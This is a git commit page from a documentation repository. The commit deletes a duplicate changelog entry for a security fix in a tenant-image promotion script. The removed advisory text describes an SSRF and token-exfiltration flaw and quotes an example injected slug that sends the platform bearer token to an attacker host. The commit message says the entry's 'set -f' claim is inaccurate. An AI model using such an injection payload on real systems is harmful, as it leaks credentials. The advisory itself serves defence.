molecule-ai/docs
41
0
Fork 0
Code Issues Pull Requests 17 Actions Packages Projects Releases Wiki Activity

fix(docs): remove duplicate OFFSEC-006 entry per hongming-pc2 review (docs#41 has authoritative entry; set -f claim inaccurate)
Secret scan / secret-scan (pull_request) Successful in 2m3s
Details
CI / build (pull_request) Successful in 4m10s
Details

Browse Source
This commit is contained in:
Molecule AI · app-lead
2026-05-15 11:31:33 +00:00
parent 3992150a47
commit e9aac3629c
1 changed files with 0 additions and 5 deletions
Download Patch File Download Diff File Expand all files Collapse all files
content/docs/changelog.mdx
-5
View File
@@ -11,11 +11,6 @@ Entries are published daily at 23:50 UTC.
## 2026-05-14
### 🔒 Security
- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths (`cp_redeploy_tenant`, `tenant_buildinfo`, `tenant_health`, `resolve_tenant_instance_id`) and ECR identifiers without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token via URL parameter injection. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call is issued, and uses `set -f` to disable glob expansion of metacharacters (`*`, `?`, `[`) in slug values. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933))
### 🔧 Fixes
- **Canvas accessibility round 3**: WCAG AA contrast fixes, focus-visible rings, and ARIA attribute corrections applied across `ConversationTraceModal`, `ErrorBoundary`, `ExternalConnectModal`, `MissingKeysModal`, `ProviderModelSelector`, `ConversationTraceModal`, `ActivityTab`, `ScheduleTab`, and `SkillsTab`. (`molecule-core` [#936](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/936), [#949](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/949))
### 🧹 Internal